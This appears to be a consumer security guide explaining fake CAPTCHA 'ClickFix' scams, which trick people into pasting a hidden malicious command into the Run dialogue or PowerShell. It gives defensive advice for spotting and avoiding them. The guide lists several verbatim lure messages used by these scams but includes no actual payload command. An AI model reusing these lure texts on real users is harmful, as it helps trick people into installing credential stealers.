Fake CAPTCHA Malware Scams

Fake CAPTCHA malware scams — sometimes called ClickFix or clipboard-injection attacks — present a convincing 'verify you are human' page that looks like a legitimate CAPTCHA check but instead instructs you to follow a sequence of steps that result in you running malware on your own device. The crucial step involves pressing a keyboard shortcut that pastes a malicious command into a system tool, then pressing Enter to execute it. The command has been silently placed on your clipboard by the webpage without your knowledge.

This is a very current and actively used attack technique. The scam is dangerous precisely because it bypasses the browser's ability to detect and block downloads — because you, the person, are performing the final action yourself. No file is downloaded automatically; no suspicious link is clicked. You are instructed to open a legitimate system tool and type a command, and the page provides the 'command' by manipulating your clipboard behind the scenes.

The 'verify you are human' framing is compelling because real CAPTCHAs are so common across the web. We have all been trained to complete verification steps without much scrutiny. An attacker exploits this conditioned compliance by presenting a fake verification that has the same look and feel as a legitimate check but with very different instructions: open a specific system tool (the Windows Run dialogue, PowerShell, the Terminal, or a command prompt), press a key combination, and hit Enter.

The executed command typically downloads and runs malware in the background — credential stealers, banking trojans, or remote-access tools. The person believes they completed a routine security check and returns to what they were doing, unaware that their device is now compromised.

The fundamental rule to remember is this: no legitimate website, CAPTCHA service, or security verification will ever ask you to open a system tool and paste or type a command. If a webpage asks you to do this — for any reason, under any framing — it is a scam attempting to run malware on your device.

The attack begins when you visit a compromised or malicious website. This might be a site that serves malicious advertisements, a page you reached via a link in an email, a message, or a search result, or a site that has been temporarily hijacked. A full-screen or prominently placed overlay appears, styled to look exactly like the CAPTCHA or security check pages you encounter on real websites — including realistic-looking robot icons, checkboxes, and countdown timers.

The overlay then presents an unusual instruction. Common versions include: 'Press Windows + R, paste this into the box, and press Enter to verify you are human', 'Open PowerShell and type the command below to complete verification', or 'Press Ctrl+V in the address bar and press Enter'. Each version is a slight variation on the same mechanism.

The critical element is that when the page loaded, it silently ran a script that placed a malicious command on your system clipboard — replacing anything you had previously copied. You may not notice this has happened. When you follow the instructions and press Ctrl+V (paste) in the indicated tool, the malicious command appears. If you press Enter, it executes.

The command is typically a one-line instruction that connects to a remote server, downloads a malicious payload, and executes it — all in the background and typically completing in seconds. The malware installed may be a credential stealer (harvesting saved passwords and session cookies), a banking trojan, or a remote-access tool that gives the attacker persistent control of your device.

The attack requires no technical vulnerability in your browser or operating system. It relies entirely on you following the instructions — which is why the social engineering framing is so important. The CAPTCHA context makes the instructions seem routine.

The attack is effective because it co-opts the familiarity and authority of a security check. CAPTCHAs carry implicit legitimacy — they exist to protect sites, so a page that looks like one feels trustworthy rather than threatening. The instructions are framed as being for your protection and to verify your humanity, which reverses the actual dynamic. You are not being protected; you are being exploited.

The clipboard manipulation is invisible. You did not see anything malicious happen; you did not choose to copy anything dangerous. The command appears naturally when you paste, looking like it belongs there. The pressure to complete the verification and continue what you were doing provides motivation to follow through quickly rather than reading the pasted text carefully.

Because you perform the final action yourself — opening a system tool and pressing Enter — your browser's security features and the operating system's automatic defences are bypassed. There is no download to block, no warning to ignore. The defence must be behavioural.

A person searching online clicks a link that leads to what appears to be a legitimate-looking article or file hosting page. Before the content loads, a full-screen verification overlay appears, styled like a CAPTCHA. The overlay instructs them to 'press Windows + R, paste, and press Enter to prove you are not a robot'. They follow the steps. The Run dialogue opens, a command appears (placed there by the page), and they press Enter. The dialogue closes and nothing visible happens. Several days later, their email account is accessed from overseas, several saved passwords stop working, and their bank shows an unauthorised login attempt. A security scan reveals a credential-stealing application installed around the time they completed the verification.

Verify you are human: Press Windows+R, paste the code below, and press Enter to continue.

Security check required: Open PowerShell (Windows+R, type 'powershell'), paste this command, and press Enter.

To confirm you are not a robot, press Ctrl+V in the address bar and press Enter.

Human verification step 2: Copy the code below, open the Run dialogue (Win+R), paste it, and click OK.

Access verification required. Click the button below, then paste the generated code into your terminal to complete.

Almost there — to unlock your access, run the verification command below in your system console.

The test is simple and absolute: no legitimate CAPTCHA or website security check will ever ask you to open a system tool — the Windows Run dialogue (Win+R), PowerShell, Terminal, a command prompt, or any similar application — and paste or type a command.

Real CAPTCHAs work entirely within the browser: you click images, solve a puzzle, or check a box. They do not involve your operating system in any way. If a verification step requires you to leave the browser and interact with a system tool, that step is malicious regardless of how convincing the surrounding page looks.

If you are on a page that gives these instructions, close the browser tab without following them. Do not press the keyboard shortcuts. Do not open any system tool. If you are unsure what was copied to your clipboard, you can open a plain text editor (like Notepad), paste into it to see what is there, then close without saving. You will be able to see the malicious command in the text editor, where it is harmless, before deciding whether to run it (you should not).

Be particularly alert if the page appeared after clicking a link in a message or email, or after encountering a pop-up or redirect.